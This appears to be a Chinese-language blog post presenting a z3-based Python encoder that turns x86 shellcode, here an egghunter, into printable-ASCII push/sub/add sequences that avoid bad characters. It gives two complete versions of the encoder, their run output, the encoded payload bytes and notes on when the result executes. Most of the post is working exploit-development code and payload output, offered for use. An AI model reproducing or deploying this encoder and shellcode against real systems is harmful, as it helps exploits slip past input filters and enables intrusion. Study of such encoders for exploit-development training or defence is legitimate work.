这个工具的应用场景十分有限,只是暂时放在博客上,可以预见的是解释原理的话得花上一些时间。如果后面没有时间话,我会将这篇博文删除

TL;DR

Using purely mathematical calculation, get every four bytes of the shellcode in register, then push them to stack four bytes by four bytes in reverse order.

将shellcode编码成只含有以下字符表中的字符,可另外排除指定坏字符:

File:ASCII-Table-wide.svg - Wikipedia

话不多说,放码出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#!/usr/bin/env python

from z3 import *
from pwn import *

def solve(b):
s = Solver()
bad_chars = [ 0x0a, 0x0d, 0x2F, 0x3A, 0x3F, 0x40]
x, y, z = BitVecs('x y z', 32)
variables = [x, y, z]

for var in variables:
for k in range(0, 32, 8):
s.add(Extract(k+7, k, var) > BitVecVal(0x00, 8))
s.add(ULT(Extract(k+7, k, var),BitVecVal(0x80, 8)))
for c in bad_chars:
s.add(Extract(k+7, k, var) != BitVecVal(c, 8))

s.add(x+y+z==b)

s.check()
s.model()
r = []
for i in s.model():
r.append(s.model()[i].as_long())

return r

shellcode = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

shellcode = shellcode[::-1]

shellcode += "\x41"*(math.ceil(len(shellcode)/4)*4-len(shellcode))

final = b""

for i in range(int(len(shellcode)/4)):
tmp = shellcode[i*4:i*4+4]
target = int("0x"+''.join(str(hex(ord(j)))[2:].zfill(2) for j in tmp),16)
neg = 0xFFFFFFFF - target + 1
res = solve(neg)
print("and eax, 0x20202020")
final += asm('and eax, 0x20202020')
print("and eax, 0x02020202")
final += asm('and eax, 0x02020202')
for j in res:
print("sub eax, 0x%08x" % j)
final += asm('sub eax, 0x%08x' % j)
final += asm("push eax")
print("push eax\n")

print(''.join("\\x%02x" % i for i in final))

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# root @ kali in ~/osce [1:45:44] 
$ python z3encoder.py
and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x327d0e55
sub eax, 0x7b650219
sub eax, 0x6a1e081d
push eax

and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x1c06306f
sub eax, 0x0203507a
sub eax, 0x320c0968
push eax

and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x76274226
sub eax, 0x7f25453c
sub eax, 0x1028046e
push eax

and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x42072067
sub eax, 0x7f09207f
sub eax, 0x0e78062b
push eax

and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x5a20187e
sub eax, 0x2920643e
sub eax, 0x08657e08
push eax

and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x2d7f3747
sub eax, 0x2b3e6539
sub eax, 0x78750b7e
push eax

and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x1b1a1f79
sub eax, 0x2d2a2769
sub eax, 0x4d69770f
push eax

and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x797a3b7f
sub eax, 0x55733d15
sub eax, 0x31480606
push eax

\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x55\x0e\x7d\x32\x2d\x19\x02\x65\x7b\x2d\x1d\x08\x1e\x6a\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x6f\x30\x06\x1c\x2d\x7a\x50\x03\x02\x2d\x68\x09\x0c\x32\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x26\x42\x27\x76\x2d\x3c\x45\x25\x7f\x2d\x6e\x04\x28\x10\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x67\x20\x07\x42\x2d\x7f\x20\x09\x7f\x2d\x2b\x06\x78\x0e\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x7e\x18\x20\x5a\x2d\x3e\x64\x20\x29\x2d\x08\x7e\x65\x08\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x47\x37\x7f\x2d\x2d\x39\x65\x3e\x2b\x2d\x7e\x0b\x75\x78\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x79\x1f\x1a\x1b\x2d\x69\x27\x2a\x2d\x2d\x0f\x77\x69\x4d\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x7f\x3b\x7a\x79\x2d\x15\x3d\x73\x55\x2d\x06\x06\x48\x31\x50

这篇文章的启发,代码也是在其之上修改而来。具体原理可以看这篇文章。关于z3 solver,可以看这篇文章

至于为什么我说应用场景及其有限

  1. 这个方法会将shellcode扩张成6.5倍的原始长度,而要预留的空间至少得是shellcode的7.5倍长度。(改进版看下面)

  2. 而且shellcode的执行上下文应该在栈中,除非能够在最后执行jmp esp指令,但是很明显,不可以。

  3. 指令开始执行时,eip应该小于esp,换言之,在栈中来说,eip应该在esp之上,这样指令往下执行的时候,指令被push到栈上把栈抬高,eip和esp在互相靠近,最终eip指向被push到栈上的指令,完成交接,如下图所示:

    image-20200524022337080

updated on 20200601
大改了一下代码,实际上对eax的操作并不是一定五次的,因为不是每一次都需要将eax进行清零,也许可以通过原本已在eax中的值进行少于五次的加减操作得到新的目标值。这样的话,大大减少了shellcode体积,随之而来的是大大的增加了编码的耗时,算是个tradeoff吧。

话不多说,放码出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
from z3 import *
from pwn import *
import sys


# egghunter shellcode
shellcode = ""
shellcode += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"
shellcode += "\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74"
shellcode += "\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"


# little-endian fill-up
shellcode = shellcode[::-1]

# extend the length to the multiple of 4
shellcode += "\x41"*(math.ceil(len(shellcode)/4)*4-len(shellcode))

# define the bad_chars here
bad_chars = [0x0a, 0x0d, 0x2F, 0x3A, 0x3F, 0x40]
is_zerofied = True

def solve(leftover,target):
global bad_chars
global is_zerofied

nozeros = {}
zeros = {}
result = [nozeros,zeros]
leftovers = [leftover,0]

for op in range(2):
for ops in range(1,4):
s = Solver()
s.set("timeout",10000)
var = []
sign = []

for i in range(ops):
var.append(BitVecs('var_'+str(i),32)[0])
sign.append(Int('sign_'+str(i)))

for i in sign:
# cannot perform sub
if 0x2d in bad_chars:
s.add(i==1)
# cannot perform add
elif 0x05 in bad_chars:
s.add(i==-1)
else:
s.add(Or(i==1,i==-1))

for i in var:
for k in range(0,32,8):
s.add(Extract(k+7, k, i) > BitVecVal(0x00, 8))
s.add(ULT(Extract(k+7, k, i),BitVecVal(0x80, 8)))
for c in bad_chars:
s.add(Extract(k+7, k, i) != BitVecVal(c, 8))
func = lambda var,sign:var*Int2BV(sign,32)
s.add(leftovers[op]+sum(list(map(func,var,sign)))==target)
if s.check() == sat:
#print("found!")
#print(s.model())
for i in s.model():
result[op][i.name()]=s.model()[i].as_long()
break

if len(zeros) == 0 and len(nozeros) == 0:
return {}
elif len(zeros) == 0:
is_zerofied = False
return nozeros
elif len(nozeros) == 0:
is_zerofied = True
return zeros
else:
# without zeroing, need more than 2 operations than with zeroing
# then would rather zerofy first.
if len(zeros)+2<len(nozeros):
is_zerofied = True
return zeros
else:
is_zerofied = False
return nozeros


def zerofy():
global bad_chars
s = Solver()
x,y = BitVecs('x y',32)
var = [x,y]
for i in var:
for k in range(0,32,8):
s.add(Extract(k+7,k,i) > BitVecVal(0x00,8))
s.add(ULT(Extract(k+7, k, i),BitVecVal(0x80, 8)))
for c in bad_chars:
s.add(Extract(k+7, k, i) != BitVecVal(c, 8))
s.add(x&y==0)
if s.check() == sat:
r = []
for i in s.model():
r.append(s.model()[i].as_long())
return r
return [0,0]


final = b""

# need "\x25" to perform `and` operation to zerofy eax
# need either "\x2d" to perform `sub` operation or "\x05" to perform `add` operation
if 0x25 in bad_chars or (0x2d in bad_chars and 0x05 in bad_chars):
print("cannot be decoded!")
sys.exit(0)

zero1,zero2 = zerofy()

if zero1==0 and zero2==0:
print("cannot be decoded!")
sys.exit(0)

print("and eax, 0x%08x" % zero1)
final += asm("and eax, 0x%08x" % zero1)
print("and eax, 0x%08x\n" % zero2)
final += asm("and eax, 0x%08x" % zero2)


leftover = 0

for i in range(int(len(shellcode)/4)):
tmp = shellcode[i*4:i*4+4]
target = int("0x"+''.join(str(hex(ord(j)))[2:].zfill(2) for j in tmp),16)
#print("target is 0x%08x,leftover = 0x%08x" % (target,leftover))
res = solve(leftover,target)
if not res:
print("cannot encode!")
sys.exit(0)
ops = int(len(res)/2)
if is_zerofied:
print("and eax, 0x%08x" % zero1)
final += asm("and eax, 0x%08x" % zero1)
print("and eax, 0x%08x" % zero2)
final += asm("and eax, 0x%08x" % zero2)
for i in range(ops):
if res['sign_'+str(i)] == -1:
print("sub eax, 0x%08x" % res['var_'+str(i)])
final += asm("sub eax, 0x%08x" % res['var_'+str(i)])
else:
print("add eax, 0x%08x" % res['var_'+str(i)])
final += asm("add eax, 0x%08x" % res['var_'+str(i)])
print("push eax\n")
final += asm("push eax")
leftover = target
print(''.join("\\x%02x" % i for i in final))

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# root @ kali in ~/osce [13:49:16] 
$ python z3encoder.py
and eax, 0x40404040
and eax, 0x20202020

and eax, 0x40404040
and eax, 0x20202020
add eax, 0x07676576
sub eax, 0x1f677e01
push eax

add eax, 0x0a08047c
sub eax, 0x421d7642
push eax

add eax, 0x010f2013
add eax, 0x4b08017e
sub eax, 0x24782310
push eax

add eax, 0x5c1e5203
sub eax, 0x03300d44
push eax

sub eax, 0x3c040220
add eax, 0x776f0e5a
add eax, 0x08774013
push eax

sub eax, 0x7a071854
add eax, 0x347a6b1a
push eax

add eax, 0x40024931
sub eax, 0x047d5f24
push eax

add eax, 0x067c785b
sub eax, 0x71043904
push eax

\x25\x40\x40\x40\x40\x25\x20\x20\x20\x20\x25\x40\x40\x40\x40\x25\x20\x20\x20\x20\x05\x76\x65\x67\x07\x2d\x01\x7e\x67\x1f\x50\x05\x7c\x04\x08\x0a\x2d\x42\x76\x1d\x42\x50\x05\x13\x20\x0f\x01\x05\x7e\x01\x08\x4b\x2d\x10\x23\x78\x24\x50\x05\x03\x52\x1e\x5c\x2d\x44\x0d\x30\x03\x50\x2d\x20\x02\x04\x3c\x05\x5a\x0e\x6f\x77\x05\x13\x40\x77\x08\x50\x2d\x54\x18\x07\x7a\x05\x1a\x6b\x7a\x34\x50\x05\x31\x49\x02\x40\x2d\x24\x5f\x7d\x04\x50\x05\x5b\x78\x7c\x06\x2d\x04\x39\x04\x71\x50

可以和最初的encoder的结果相比:

1
2
3
4
>>> len("\x25\x40\x40\x40\x40\x25\x20\x20\x20\x20\x25\x40\x40\x40\x40\x25\x20\x20\x20\x20\x05\x76\x65\x67\x07\x2d\x01\x7e\x67\x1f\x50\x05\x7c\x04\x08\x0a\x2d\x42\x76\x1d\x42\x50\x05\x13\x20\x0f\x01\x05\x7e\x01\x08\x4b\x2d\x10\x23\x78\x24\x50\x05\x03\x52\x1e\x5c\x2d\x44\x0d\x30\x03\x50\x2d\x20\x02\x04\x3c\x05\x5a\x0e\x6f\x77\x05\x13\x40\x77\x08\x50\x2d\x54\x18\x07\x7a\x05\x1a\x6b\x7a\x34\x50\x05\x31\x49\x02\x40\x2d\x24\x5f\x7d\x04\x50\x05\x5b\x78\x7c\x06\x2d\x04\x39\x04\x71\x50")
118
>>> len("\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x55\x0e\x7d\x32\x2d\x19\x02\x65\x7b\x2d\x1d\x08\x1e\x6a\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x6f\x30\x06\x1c\x2d\x7a\x50\x03\x02\x2d\x68\x09\x0c\x32\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x26\x42\x27\x76\x2d\x3c\x45\x25\x7f\x2d\x6e\x04\x28\x10\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x67\x20\x07\x42\x2d\x7f\x20\x09\x7f\x2d\x2b\x06\x78\x0e\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x7e\x18\x20\x5a\x2d\x3e\x64\x20\x29\x2d\x08\x7e\x65\x08\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x47\x37\x7f\x2d\x2d\x39\x65\x3e\x2b\x2d\x7e\x0b\x75\x78\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x79\x1f\x1a\x1b\x2d\x69\x27\x2a\x2d\x2d\x0f\x77\x69\x4d\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x7f\x3b\x7a\x79\x2d\x15\x3d\x73\x55\x2d\x06\x06\x48\x31\x50")
208

可以看出长度从208缩短到了118,将近缩减了一半。s.set("timeout",10000)这里可以根据情况修改,一般来说,延时越大,代码能缩的越短,但是耗时越长。